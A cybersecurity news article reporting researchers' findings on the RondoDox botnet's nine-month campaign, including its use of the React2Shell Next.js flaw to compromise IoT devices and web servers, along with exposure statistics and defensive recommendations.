RondoDox Botnet Attacked on Critical React2Shell Flaw To Access IoT Devices & Web Servers -

Post Views: 61

“IoT Devices and Web Servers got Accessed Unauthorized by RondoDox Botnet by exploiting a critical React2Shell Flaw.”

Details of a relentless nine-month-long effort that targeted Internet of Things (IoT) devices and web applications to enlist them in a botnet known as RondoDox have been revealed by cybersecurity experts.

CloudSEK, Analysis

As of December 2025, the activity has been seen using the newly revealed React2Shell (CVE-2025-55182, CVSS score: 10.0) vulnerability as a first point of access.

“It effectively prevents reinfection by competing actors by killing non-whitelisted processes every ~45 seconds and continuously scanning /proc to enumerate running executables.”

A serious security flaw in Next.js and React Server Components (RSC) that could enable unauthenticated attackers to execute code remotely on vulnerable devices is known as React2Shell.

Shadowserver Foundation, Statistics

As of December 31, 2025, there are around 90,300 cases that are still vulnerable; 68,400 of them are in the United States, followed by Germany (4,300), France (2,800), and India (1,500).

Since its debut in early 2025, RondoDox has expanded its scope by acquiring new N-day security flaws, such as CVE-2023-1389 and CVE-2025-24893. It’s important to note that Darktrace, Kaspersky, and VulnCheck already brought attention to the misuse of React2Shell to propagate the botnet.

It is estimated that the RondoDox botnet campaign had three different stages until CVE-2025-55182 was exploited.

March – April 2025: Manual vulnerability scanning and preliminary reconnaissance.
April – June 2025: Web apps, including WordPress, Drupal, and Struts2, as well as Internet of Things devices, such as Wavlink routers, are subjected to daily mass vulnerability probing.
July – early December 2025: Large-scale automatic deployment every hour.

A botnet loader and health checker (“/nuts/bolts”), cryptocurrency miners (“/nuts/poop”), and a Mirai botnet variant (“/nuts/x86”) are said to have been dropped on compromised devices after the threat actors started scans to find vulnerable Next.js servers in the attacks discovered in December 2025.

Before downloading the main bot binary from its command-and-control (C2) server, “-nuts/bolts” is intended to stop rival viruses and currency miners. It has been discovered that one version of the tool can set up persistence utilizing “.etc/crontab” and eliminate known botnets, Docker-based payloads, artifacts from previous campaigns, and related cron tasks.

Organizations are encouraged to build Web Application Firewalls (WAFs), segment all IoT devices into dedicated VLANs, update Next.js to a patched version as soon as feasible, monitor for unusual process execution, and block known C2 infrastructure in order to reduce the risk posed by this threat.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity & information security. He has written many amazing articles related to cybersecurity concepts, with the latest trends in cyber awareness and ethical hacking. Find out more about “Him.”

Police Alert the Public about a New Year’s Greeting Scam that is Going Around on WhatsApp